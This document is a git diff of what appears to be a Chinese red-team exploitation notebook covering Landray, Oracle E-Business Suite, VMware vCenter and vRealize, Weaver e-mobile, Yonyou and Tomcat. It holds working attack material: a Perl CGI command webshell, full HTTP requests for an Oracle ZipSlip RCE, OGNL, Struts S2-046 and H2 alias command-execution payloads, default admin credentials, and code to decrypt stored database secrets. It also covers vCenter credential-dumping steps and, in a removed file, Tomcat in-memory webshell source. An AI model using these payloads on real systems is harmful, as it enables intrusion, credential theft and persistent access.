+- [ ] CVE-2020-4280 反序列化 + + diff --git a/application/landray/README.md b/application/landray/README.md new file mode 100644 index 00000000..2951f72c --- /dev/null +++ b/application/landray/README.md @@ -0,0 +1,7 @@ +历史漏洞 + +- pre-auth SSRF/FileRead - custom.jsp +- post-auth SQLi - kmImeetingRes.do +- post-auth XMLDecoderDeserialization - sysSearchMain.do +- post-auth RCE = getBean() + bsh.Interpreter - dataxml.jsp +- post-auth JDBC RCE - admin.do \ No newline at end of file diff --git "a/application/landray/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/landray/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..ade650c2 --- /dev/null +++ "b/application/landray/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,53 @@ +利用研究 +--- + +### 配置文件解密 - admin.properties + +文件位置 +> ekp/WEB-INF/KmssConfig/admin.properties + +解密工具 +- https://github.com/zhutougg/LandrayDES + + + +### 配置文件解密 - kmssconfig.properties +文件位置 + +> ekp/WEB-INF/KmssConfig/kmssconfig.properties + +example + +![image](https://user-images.githubusercontent.com/55024146/178807547-9882a2d1-7c1d-487e-af42-28a610a8fcaf.png) + + +解密代码实现 + +```java +package org.example; + +import java.io.*; +import java.nio.file.Files; +import java.nio.file.Paths; +import com.landray.kmss.sys.config.action.SysConfigAdminUtil; + +public class SysConfigDecrypt { + public static void main(String[] args) throws Exception { + InputStream in = Files.newInputStream(Paths.get("H:\\landray\\ekp\\WEB-INF\\KmssConfig\\kmssconfig.properties")); + InputStreamReader inr = new InputStreamReader(SysConfigAdminUtil.doPropertiesDecrypt(in)); + BufferedReader br = new BufferedReader(inr); + String line; + StringBuilder sb = new StringBuilder(); + while((line = br.readLine()) != null){ + sb.append(line).append("\r\n"); + } + System.out.println(sb); + } +} +``` + + +解密效果如图 + +![image](https://user-images.githubusercontent.com/55024146/178808195-4c7c822d-36bb-47ac-a54e-8a0ce7014581.png) + diff --git a/application/mcafee/README.md b/application/mcafee/README.md new file mode 100644 index 00000000..fab488c5 --- /dev/null +++ b/application/mcafee/README.md @@ -0,0 +1,4 @@ +历史漏洞 + +- [ ] ZipSlip -> RCE + diff --git a/application/oracle/access manager/README.md b/application/oracle/access manager/README.md new file mode 100644 index 00000000..e6eaa515 --- /dev/null +++ b/application/oracle/access manager/README.md @@ -0,0 +1,3 @@ +历史漏洞 + +- [] CVE-2021-35587 RCE diff --git a/application/oracle/e-business suite/README.md b/application/oracle/e-business suite/README.md new file mode 100644 index 00000000..c30bafb4 --- /dev/null +++ b/application/oracle/e-business suite/README.md @@ -0,0 +1,100 @@ +CVE-2022-21587 pre-auth ZipSlip -> RCE +--- + +#### 漏洞分析 +web.xml + +```xml + + BneUploaderService + oracle.apps.bne.integrator.upload.BneUploaderService + + + + BneUploaderService + /BneUploaderService + +``` + +BneUploaderService 的父类 BneAbstractXMLServlet 在处理文件上传包时会调用 BneUnZip#doUnZip 进行解压处理 + + +```java +public String doUnZip(String var1) throws IOException { + new String(""); + String var3 = new String(""); + BneContext.getLogInstance().log(7, "BneUnZip.doUpZip Enter fileName: " + var1); + String var2 = BneSitePropertyManager.getInstance().getProperty("BNE_UPLOAD_STAGING_DIRECTORY"); + + try { + BufferedOutputStream var4 = null; + FileInputStream var5 = new FileInputStream(var1); + ZipInputStream var6 = new ZipInputStream(new BufferedInputStream(var5)); + + ZipEntry var7; + while((var7 = var6.getNextEntry()) != null) { + byte[] var8 = new byte[2048]; + var3 = var2 + System.getProperty("file.separator") + var7.getName(); + // 漏洞点 entry.getName() 是可控的 -> zip slip + FileOutputStream var10 = new FileOutputStream(var3); +``` + +需要注意的点: 解压前调用 BneDecoder#doDecode 进行解码(Unix-to-Unix encoding),所以在生成 zip-slip 的文件后需要进行 uuencode 编码. + +#### 漏洞复现 + +1、生成 uuencode 编码后的payload + +- txkFNDWRR.pl +```perl +use CGI; +print CGI::header( -type => 'text/plain' ); +my $cmd = CGI::http('HTTP_CMD'); +print system($cmd); +exit; +``` + +ps: jdk 自带 uuencode 编码的实现, 关键代码: + +```java +byte[] bytes = Files.readAllBytes(Paths.get(evilZipFile)); +String payload = new UUEncoder(zipName).encodeBuffer(bytes); +``` + +![image](https://user-images.githubusercontent.com/55024146/216362687-707f41df-533b-4bb4-8981-c056ffd81f99.png) + +2、第1个请求,通过 zipslip 覆盖 txkFNDWRR.pl + +```http +POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 +Host: apps.example.com:8000 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv +Content-Length: 769 + +------WebKitFormBoundaryZsMro0UsAQYLDZGv +Content-Disposition: form-data; name="bne:uueupload" + +TRUE +------WebKitFormBoundaryZsMro0UsAQYLDZGv +Content-Disposition: form-data; name="uploadfilename";filename="test.zip" + +[payload] +------WebKitFormBoundaryZsMro0UsAQYLDZGv-- + +``` + +3、第2个请求,调用 CGI 执行命令并回显 + +```http +POST /OA_CGI/FNDWRR.exe HTTP/1.1 +Host: apps.example.com:8000 +cmd: pwd +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 + +``` + +![image](https://user-images.githubusercontent.com/55024146/216365358-cdd610ee-108c-422b-b46c-e5c885facbc9.png) + + +详见: https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ diff --git a/application/vmware/vcenter/README.md b/application/vmware/vcenter/README.md new file mode 100644 index 00000000..13360fd1 --- /dev/null +++ b/application/vmware/vcenter/README.md @@ -0,0 +1,11 @@ +历史漏洞 + +- [x] CVE-2022-31680 VMware vCenter PSC 反序列化 +- [ ] CVE-2021-44228 VMware Product RCE via Log4Shell +- [ ] CVE-2021-22017 VMware vCenter rhttpproxy Bypass +- [ ] CVE-2021-22005 VMware vCenter 文件上传 +- [ ] CVE-2021-21985 VMware vCenter 远程代码执行 +- [ ] CVE-2021-21973 VMware vCenter SSRF -> /sdk +- [ ] CVE-2021-21972 VMware vCenter 远程命令执行 +- [ ] CVE-2021-00000 VMware vCenter 文件读取 -> /eam/vib?id= +- [ ] CVE-2021-00000 VMware vCenter SSRF/文件读取 -> /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url= diff --git "a/application/vmware/vcenter/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/vmware/vcenter/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..32f17000 --- /dev/null +++ "b/application/vmware/vcenter/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,71 @@ +基础信息 +--- + +#### 获取版本号 +version_detect.xml +```xml + + + + <_this type="ServiceInstance">ServiceInstance + + + +``` + +Curl One Liner +```shell +type version_detect.xml | curl -X POST -k -H 'Content-type:text/xml' -d @- https://10.10.100.100/sdk +``` + +![image](https://user-images.githubusercontent.com/55024146/153741369-ea745c9d-7851-4971-a2df-a3eb08605e6a.png) + +#### 数据库配置文件 +```shell +find -name vcdb.properties +cat /etc/vmware-vpx/vcdb.properties +# cat /etc/vmware/service-state/vpxd/vcdb.properties +``` +![image](https://user-images.githubusercontent.com/55024146/153741704-673cb757-be5e-4be5-93bd-cd2cef0fa93a.png) + + +#### 利用研究 + +攻击路径 +--- +- CVE-2021-44228(root) -> CVE-2020-3952 -> gain Administrative access +- CVE-2021-22005(root) -> CVE-2020-3952 -> gain Administrative access +- CVE-2021-21985(no root) -> CVE-2021-3156/CVE-2021-4034(root) -> CVE-2020-3952 -> gain Administrative access +- CVE-2021-21972(no root) -> CVE-2021-3156/CVE-2021-4034(root) -> CVE-2020-3952 -> gain Administrative access + +### CVE-2021-22005(root) -> CVE-2020-3952 -> gain Administrative access +> 实战案例 + +CVE-2021-22005获取初始webshell权限 + +CVE-2020-3952提取IdP证书、伪造管理员cookie获取后台权限 +- 工具地址 + - [vcenter_saml_login](https://github.com/horizon3ai/vcenter_saml_login) + +data.mdb位置: +- Linux: + + ``` + /storage/db/vmware-vmdir/data.mdb + ``` +- Windows + + ``` + C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb + ``` + +![image](https://user-images.githubusercontent.com/55024146/144646720-bc6bb84a-def4-41e6-8ccc-8aedd89165b8.png) + +访问https://10.10.10.1/ui,在 /ui 路径下替换上一步所获得的cookie + +![image](https://user-images.githubusercontent.com/55024146/144649479-4b2c2947-5aa2-44bb-b0d5-c7e610799e78.png) + + +扩大战果 +- 可通过vcenter的快照功能获取虚拟机的快照,然后通过内存取证的姿势dump凭证,pth; +- 也可将快照传到本地,再恢复成虚拟机,然后通过PE,重命名CMD.EXE为OSK.exe覆盖原OSK.exe,此时开机打开屏幕键盘会弹出SYSTEM权限的命令行窗口,本地上线cs然后hashdump抓取凭证,pth即可。(by banliz1) diff --git a/application/vmware/vrealize log insight/README.md b/application/vmware/vrealize log insight/README.md new file mode 100644 index 00000000..8bab0d9f --- /dev/null +++ b/application/vmware/vrealize log insight/README.md @@ -0,0 +1,222 @@ +VMSA-2023-0001 pre-auth ZipSlip -> RCE +--- + +#### 漏洞分析 + + +漏洞的重点在于两处: +- 1 Thrift RPC 未授权的调用 +- 2 .pak 文件处理时的 zip slip 漏洞 + +**1 Thrift RPC 未授权的调用** + +DaemonCommands 实现的 Thrift RPC 命令 +```java +processMap.put("waitUntilStarted", new waitUntilStarted()); +processMap.put("waitUntilDaemonStarted", new waitUntilDaemonStarted()); +processMap.put("requestCommand", new requestCommand()); +processMap.put("runCommand", new runCommand()); +processMap.put("getCommandStatus", new getCommandStatus()); +processMap.put("cancelQueuedCommand", new cancelQueuedCommand()); +processMap.put("cancelRunningCommand", new cancelRunningCommand()); +processMap.put("getQueuedCommands", new getQueuedCommands()); +processMap.put("getRunningCommands", new getRunningCommands()); +processMap.put("getExitedCommands", new getExitedCommands()); +processMap.put("showInstrumentationStats", new showInstrumentationStats()); +processMap.put("resetInstrumentationStats", new resetInstrumentationStats()); +processMap.put("getHealthStatus", new getHealthStatus()); +processMap.put("getRecentHealthStatus", new getRecentHealthStatus()); +processMap.put("getArchiveStatus", new getArchiveStatus()); +processMap.put("getArchiveStatuses", new getArchiveStatuses()); +processMap.put("getLiveHealthMeter", new getLiveHealthMeter()); +processMap.put("serviceStartResult", new serviceStartResult()); +processMap.put("getVsphereHosts", new getVsphereHosts()); +processMap.put("configureVsphereHosts", new configureVsphereHosts()); +processMap.put("sampleEventType", new sampleEventType()); +processMap.put("expandEventType", new expandEventType()); +processMap.put("expandPattern", new expandPattern()); +processMap.put("getLocalStats", new getLocalStats()); +processMap.put("getClusterStats", new getClusterStats()); +processMap.put("getClusterHealthStatus", new getClusterHealthStatus()); +processMap.put("getClusterLiveHealthMeter", new getClusterLiveHealthMeter()); +processMap.put("getConfig", new getConfig()); +processMap.put("setConfig", new setConfig()); +processMap.put("waitUntilBootstrapped", new waitUntilBootstrapped()); +processMap.put("getNodeType", new getNodeType()); +processMap.put("setNodeType", new setNodeType()); +processMap.put("setTokenOnWorker", new setTokenOnWorker()); +processMap.put("isBootstrapped", new isBootstrapped()); +processMap.put("isRestartRequired", new isRestartRequired()); +processMap.put("setBootstrapped", new setBootstrapped()); +processMap.put("unbootstrap", new unbootstrap()); +processMap.put("join", new join()); +processMap.put("applyMembership", new applyMembership()); +processMap.put("approveMembership", new approveMembership()); +processMap.put("removeMembership", new removeMembership()); +processMap.put("setMaintenanceMode", new setMaintenanceMode()); +processMap.put("getMaintenanceNodes", new getMaintenanceNodes()); +processMap.put("getMembers", new getMembers()); +processMap.put("getMembershipPendingWorkers", new getMembershipPendingWorkers()); +processMap.put("getNodeStatus", new getNodeStatus()); +processMap.put("getNodeIPs", new getNodeIPs()); +processMap.put("sendAlertNotification", new sendAlertNotification()); +processMap.put("runRemoteUpgradeCommand", new runRemoteUpgradeCommand()); +processMap.put("updateClusterSslCertificate", new updateClusterSslCertificate()); +processMap.put("getClusterCertificate", new getClusterCertificate()); +processMap.put("restoreDefaultClusterSslCertificate", new restoreDefaultClusterSslCertificate()); +processMap.put("isCustomCertificateUsed", new isCustomCertificateUsed()); +processMap.put("addClusterCACertificate", new addClusterCACertificate()); +processMap.put("removeClusterCACertificate", new removeClusterCACertificate()); +processMap.put("repairCassandra", new repairCassandra()); +processMap.put("runPostUpgradeMigrations", new runPostUpgradeMigrations()); +``` + +当前 rce chain 只用到了 requestCommand 、getConfig + +1) 通过 getConfig 获取 token,为什么需要这个token? +- com.vmware.loginsight.daemon.commands.SystemCommands#remotePakDownloadCommand + +```java +public AbstractCommandExecutor remotePakDownloadCommand(final RemotePakDownloadCommand remotePakDownloadCommand, DistributedConfig distributedConfig) throws DistributedConfigException, MalformedURLException, RemoteUpgradeException { + if (!remotePakDownloadCommand.getSourceNodeToken().equals(distributedConfig.getMasterDaemon().getToken())) { + throw new RemoteUpgradeException("Remote PAK Download command must come from master."); + } else { +``` + +2) 通过 requestCommand 可执行的命令 + +- com.vmware.loginsight.daemon.DaemonCommandsHandler#requestCommand + +```java +switch (command.commandType) { + case SHUTDOWN_COMMAND: + ShutdownCommandExecutor sce = new ShutdownCommandExecutor(this.shutdownRunnable); + if (!command.shutdownCommand.immediately) { + return this.commandManager.addCommand(command, sce, !command.shutdownCommand.waitForQueued); + } + + sce.now(); + break; + case REPO_IMPORT_COMMAND: + return this.commandManager.addCommand(command, this.repoCommands.importCommand(command.repoImportCommand)); + case RESTART_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.restartCommand(command.restartCommand), !command.restartCommand.waitForQueued); + case PHONE_HOME_FEEDBACK_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.phoneHomeFeedbackCommand(command.phoneHomeFeedbackCommand)); + case HOST_SYNC_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.hostSyncCommand(command.hostSyncCommand)); + case NTP_SYNC_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.ntpSyncCommand(command.ntpSyncCommand)); + case SUPPORT_BUNDLE_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.supportBundleCommand(command.supportBundleCommand)); + case PAK_UPGRADE_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.pakUpgradeCommand(command.pakUpgradeCommand)); + case CONFIG_LOL_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.configLolCommand()); + case REMOTE_PAK_DOWNLOAD_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.remotePakDownloadCommand(command.remotePakDownloadCommand, (DistributedConfig)this.configurationHolder.getConfiguration(DistributedConfig.class))); + } +``` + +分别调用 remotePakDownloadCommand 和 pakUpgradeCommand 下载恶意的 pak 并进行处理 + +**2 .pak 文件处理时的 zip slip 漏洞** + +- com.vmware.loginsight.daemon.commands.SystemCommands#pakUpgradeCommand + +pakUpgradeCommand 的执行流程中会调用py脚本执行 pak 的处理 + +- opt/vmware/bin/loginsight-pak-upgrade + +```python +if __name__ == '__main__': + loginsight_home = '/usr/lib/loginsight' + cmd = [os.path.join(loginsight_home, 'application', 'sbin', 'loginsight-pak-upgrade.py')] + cmd.extend(sys.argv[1:]) + p = subprocess.Popen(cmd, preexec_fn=os.setsid) + p.wait() + sys.exit(p.returncode) +``` + +- /usr/lib/loginsight/application/sbin/loginsight-pak-upgrade.py + +关键代码 + +```python + +# application/sbin/loginsight-pak-upgrade.py:378 +import tarfile + +# Extract necessary files from the pak file +def extractFiles(inputFile, fileList): + try: + tar = tarfile.open(inputFile, "r") + except: + raise Exception("Cannot open " + inputFile) + try: + if len(fileList) == 0: + tar.extractall() + else: + for fname in fileList: + tar.extract(fname) + except: + raise Exception("Cannot extract file from pak file") + finally: + tar.close() + return +``` + +在从 pak 文件中提取文件,调用python 的 tarfile库进行解压 + +- https://www.securecodewarrior.com/article/traversal-bug-in-pythons-tarfile-module + +由于该库存在zipslip漏洞,从而导致任意文件写入 + +--- + +注意: 当调用 extractFiles(inputFile, fileList),且fileList不为空时,只会解压filelist中的文件,所以需要找到fileList为空的调用 + +```python + # perform upgrade +else: + fileList = [pak.mfFile, pak.certFile] + # extract .cert and .mf files + extractFiles(inputFile, fileList) + # verify certificate and signature + if pak.verifyCertificate(): + if pak.validateSignature(): + manifest = Manifest.parseManifest(pak.mfFile) + if options.force_install: + manifest.skip_version_check = True + version = str(manifest.verTo) + # check and perform upgrade + if manifest.checkSupportVersion(): + if manifest.checkDiskSpace(): + # extract all files + extractFiles(inputFile, []) +``` + +所以构造的pak文件需要满足3个条件: + +``` +if pak.verifyCertificate(): +if pak.validateSignature(): +if manifest.checkSupportVersion(): +``` + +#### 漏洞复现 + +horizon3ai 后面放出了基于 py 的利用工具 https://github.com/horizon3ai/vRealizeLogInsightRCE ,NB但复杂 + +ps: 用 java 写 50 行左右代码足以 + + +![image](https://user-images.githubusercontent.com/55024146/216533004-86098604-80c1-4b49-856c-36b8f0032bbd.png) + + + +ref +- https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/ +- https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive/ + + diff --git a/application/vmware/workspace one access/README.md b/application/vmware/workspace one access/README.md new file mode 100644 index 00000000..9e9cea78 --- /dev/null +++ b/application/vmware/workspace one access/README.md @@ -0,0 +1,6 @@ +历史漏洞 + +- [ ] CVE-2022-22954 SSTI -> pre-auth RCE +- [ ] CVE-2021-22056 SSRF +- [ ] CVE-2020-4006 Comand Injection + diff --git "a/application/weaver/ecology/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/weaver/ecology/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..856e25d2 --- /dev/null +++ "b/application/weaver/ecology/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,18 @@ +### 0x01 默认账号密码 +``` +sysadmin/1 +``` +对应数据库的 +- 表名:`HrmResourceManager` +- 字段:`password` + +### 0x02 XStream 反序列化漏洞 + +需要考虑的实战场景: +- XStream的不出网利用 + - CVE-2021-39149 TemplatesImpl + - CVE-2021-21350 BCEL +- 回显 & 内存马 + + + diff --git a/application/weaver/emobile/README.md b/application/weaver/emobile/README.md new file mode 100644 index 00000000..0d039edd --- /dev/null +++ b/application/weaver/emobile/README.md @@ -0,0 +1,100 @@ +前置基础 +--- + + +相关漏洞 +--- +### 后台 & 默认账号密码 + +- 后台地址 +``` +/manager/login.do +``` +- 默认账号密码 +e-mobile常搭配e-cology使用、系统管理员即为e-cology的默认管理员 +``` +sysadmin/1 +``` + +### CNVD-2017-03561 login.do OGNL 表达式注入漏洞 + +已测试版本 +``` +v6.5 +v5.5 +``` + +触发点 +- /login.do?message=${} +- /manager/login.do?message=${} + +回显 + +```java +message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami +``` + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/157926046-e10965ef-4eef-4a87-8105-cfcf7849437c.png) + + + +### CNVD-2017-07285 S2-046 (S2系列) + +已测试版本 +``` +v5 +``` + +S2系列漏洞 + +![image](https://user-images.githubusercontent.com/55024146/157924785-3104e738-e0ad-4695-874d-43b5bb675fa4.png) + +回显 +``` +filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} +``` +测试效果(S2-046) + +![image](https://user-images.githubusercontent.com/55024146/157925660-8eb25fbb-8634-491f-bcf8-6181f5686686.png) + + + + + +### CNVD-2021-25287 SQLi to RCE (messageType.do & client.do) + +已测试版本 +``` +v6.6 +``` + +内置H2数据库,可以利用alias别名,调用java代码达到命令执行的效果 + + +```java +CREATE ALIAS EXEC AS +$$ void e(String cmd) throws java.io.IOException +{java.lang.Runtime rt= java.lang.Runtime.getRuntime();rt.exec(cmd);}$$ +CALL EXEC('whoami'); +``` + +测试效果 +- messageType.do + + + + + +- client.do + + + + + + + + + + diff --git a/application/yonyou/code/ncDatabase.jar b/application/yonyou/code/ncDatabase.jar new file mode 100644 index 00000000..f41f980c Binary files /dev/null and b/application/yonyou/code/ncDatabase.jar differ diff --git "a/application/yonyou/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/yonyou/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..4685aca5 --- /dev/null +++ "b/application/yonyou/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,36 @@ +利用研究 +--- + +### 数据库密码解密 + +数据库配置文件位置 + +> /ierp/bin/prop.xml + +example + +``` + +nc +C2 +jdbc:sqlserver://127.0.0.1:1433;database=nc;sendStringParametersAsUnicode=false +nc +jlehfdffcfmohiag +com.microsoft.sqlserver.jdbc.SQLServerDriver +SQLSERVER +50 +10 +nc.bs.mw.ejb.xares.IerpDataSource +nc.bs.mw.ejb.xares.IerpXADataSource +0 +0 +0 + +``` + +效果如图: + +![image](https://user-images.githubusercontent.com/55024146/178786818-366dc752-2f40-4b80-9dbf-98e206aa732c.png) + + + diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 28.png b/code-audit/01_ofcms/ofcms.assets/Untitled 28.png deleted file mode 100644 index 8b7e1ea2..00000000 Binary files a/code-audit/01_ofcms/ofcms.assets/Untitled 28.png and /dev/null differ diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 6.png b/code-audit/01_ofcms/ofcms.assets/Untitled 6.png deleted file mode 100644 index c1c1c5b5..00000000 Binary files a/code-audit/01_ofcms/ofcms.assets/Untitled 6.png and /dev/null differ diff --git a/component/batik/README.md b/component/batik/README.md new file mode 100644 index 00000000..7e1e376a --- /dev/null +++ b/component/batik/README.md @@ -0,0 +1,7 @@ +- https://xmlgraphics.apache.org/batik/ + +> actually can lead to rce + + +image + diff --git a/component/commons-jxpath/README.md b/component/commons-jxpath/README.md new file mode 100644 index 00000000..af20d4a8 --- /dev/null +++ b/component/commons-jxpath/README.md @@ -0,0 +1,13 @@ +> CVE-2022-41852 +- [Extension_Functions](https://commons.apache.org/proper/ç/users-guide.html#Extension_Functions) + +``` +Using the standard extension functions, you can call methods on objects, static methods on classes +and create objects using any constructors. All class names should be fully qualified. +``` + +image + + + + diff --git a/component/hutool/README.md b/component/hutool/README.md new file mode 100644 index 00000000..e3c43ff7 --- /dev/null +++ b/component/hutool/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2018-17297 ZipSlip + +- [Hutool任意文件覆盖漏洞分析](https://www.sqyysec.com/Hutool%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) diff --git a/component/urlrewritefilter/README.md b/component/urlrewritefilter/README.md new file mode 100644 index 00000000..d1a839c1 --- /dev/null +++ b/component/urlrewritefilter/README.md @@ -0,0 +1,42 @@ + + +#### [Arbitrary resource file download in urlrewrite.xml](https://jira.atlassian.com/browse/CONFSERVER-26888) + +**Description** + +There is an arbitrary resource file download vulnerability triggered by a third party library org.tuckey.web.filters.urlrewrite.UrlRewriteFilter. + +The urlrewrite.xml rules file shows the pattern that will trigger a forward rule, which is the equivelant of performing dp = request.getServletContext().getRequestDispatcher(resource); dp.forward(request, response);. This construct allows a user to forward requests to any resource file on the server, such as /WEB-INF/web.xml - which could potentially contain sensitive information like usernames and passwords. + +web.xml +```xml + + + UrlRewriteFilter + org.tuckey.web.filters.urlrewrite.UrlRewriteFilter + +``` +urlrewrite.xml +```xml +... + + ^/s/(.*)/_/([^\?]*).* + + /2ドル + + +``` + +The attached screenshot shows this issue being exploited. + +![image](https://user-images.githubusercontent.com/55024146/186207280-b6436a75-5da9-4c69-887d-772887afbcb3.png) + +#### CVE-2021-26085 & CVE-2021-26086 + +- https://hackerone.com/reports/1369288 +- https://xz.aliyun.com/t/10109 +- https://tttang.com/archive/1323/ + +#### CVE-2022–31656 + +- https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd diff --git a/development/javassist/README.md b/development/javassist/README.md new file mode 100644 index 00000000..2408b6d9 --- /dev/null +++ b/development/javassist/README.md @@ -0,0 +1,17 @@ + +https://www.javassist.org/tutorial/tutorial.html + +解决需求: + +根据已有模板动态创建 class,可以修改部分需要自定义的字段值 + +应用场景: + +由内存马模板文件动态生成自定义密码/密钥/请求头等的 class + +--- + +问题记录 + +01 javassist.NotFoundException +- https://blog.csdn.net/paincupid/article/details/51175244 diff --git a/fileless-shell/resin/README.md b/fileless-shell/resin/README.md deleted file mode 100644 index 8d9622a0..00000000 --- a/fileless-shell/resin/README.md +++ /dev/null @@ -1,33 +0,0 @@ -**目录** -- 动态注册Servlet内存马 -- 动态注册Filter内存马 - -> 已测试 3.1.16、4.0.65 - -### 动态注册Servlet内存马 - -#### Resin 3.x -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144110176-47b8e700-3325-4e06-aeaa-34147ee78388.png) - - -#### Resin 4.x -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144110009-e42cc268-2e4d-423e-8cc5-73925e674bf1.png) - - -### 动态注册Filter内存马 - -#### Resin 3.x -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144110320-d0c6b574-c5d8-419c-b68e-08342236a7b1.png) - - -#### Resin 4.x - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144109894-748339fa-78de-4e9e-a0a0-6d41a4f6880b.png) diff --git a/fileless-shell/tomcat/README.md b/fileless-shell/tomcat/README.md deleted file mode 100644 index 1172f49b..00000000 --- a/fileless-shell/tomcat/README.md +++ /dev/null @@ -1,394 +0,0 @@ -目录 - -- Listener 内存马 -- Valve 内存马 - - -> 已测试 tomcat8 - -### Listener 内存马 - -#### 静态添加Listener -- web.xml -- 注解 @WebListener - -##### web.xml -> ```xml -> -> -> -> com.example.tomcat8.listener.ListenerDemo -> -> -> ``` - -![image](https://user-images.githubusercontent.com/55024146/144615972-ff9454cc-6841-424b-9975-3e8f72ab5ca4.png) - -##### 注解 @WebListener - -@WebListener - -> ```java -> @WebListener -> public class ListenerDemo implements ServletRequestListener { -> @Override -> public void requestInitialized(ServletRequestEvent sre) { -> HttpServletRequest req = (HttpServletRequest) sre.getServletRequest(); -> try { -> SimpleDateFormat sdf = new SimpleDateFormat(); -> sdf.applyPattern("yyyy-MM-dd HH:mm:ss"); -> Date date = new Date(); -> System.out.println("Listener触发时间:" + sdf.format(date)); -> if (sre.getServletRequest().getParameter("cmd") != null){ -> Process process = Runtime.getRuntime().exec(sre.getServletRequest().getParameter("cmd")); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream())); -> Field requestF = req.getClass().getDeclaredField("request"); -> requestF.setAccessible(true); -> Request request = (Request)requestF.get(req); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> request.getResponse().getOutputStream().write(stringBuilder.toString().getBytes()); -> request.getResponse().getOutputStream().flush(); -> request.getResponse().getOutputStream().close(); -> } -> } catch (IOException | NoSuchFieldException | IllegalAccessException e) { -> e.printStackTrace(); -> } -> } -> @Override -> public void requestDestroyed(ServletRequestEvent sre) { -> } -> } -> ``` - -![image](https://user-images.githubusercontent.com/55024146/144616074-21954a43-ea72-4334-b128-22c7f3855d0a.png) - - -#### 动态添加Listener -关于动态添加Listener,需要了解一下`ServletContext`接口addListener()方法。 - -![image](https://user-images.githubusercontent.com/55024146/144616198-eb6a60f9-d9e9-44a9-84c2-0616656427f1.png) - -> \# 查看该接口得实现类 -> -> ctrl + alt + B - - -![image](https://user-images.githubusercontent.com/55024146/144616249-1def0739-ccce-429c-ba70-905acb0a8409.png) - -跟进ApplicationContext#addListener方法 - -![image](https://user-images.githubusercontent.com/55024146/144616350-1f0de065-abf2-429d-9af6-697497b5f567.png) - -可以发现,Listener添加的具体逻辑在方法`this.context.addApplicationEventListener(t)`。 - -继续跟进 - -![image](https://user-images.githubusercontent.com/55024146/144616378-c1b1f452-f7c7-414d-8a86-6fb24bbf9072.png) - -可以发现,将传入的Listener对象添加到applicationEventListenersList,至此,Listener添加流程结束。 - -所以接下来将添加流程用代码实现即可: - -- 自定义恶意的Listener -- 获取context (StandardContext) -- 反射调用addApplicationEventListener()动态添加Listener,实现Listener型内存马 - -step1-自定义listener - -``` -略 -``` - -step2-获取context - -> ```java -> // 从servletContext中获取context属性 -> applicationContext -> // 从applicationContext中获取context属性 -> standardContext*/ -> ServletContext servletContext = request.getServletContext(); -> Field appctx = servletContext.getClass().getDeclaredField("context"); -> appctx.setAccessible(true); -> ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); -> Field stdctx = applicationContext.getClass().getDeclaredField("context"); -> stdctx.setAccessible(true); -> StandardContext standardContext = (StandardContext) 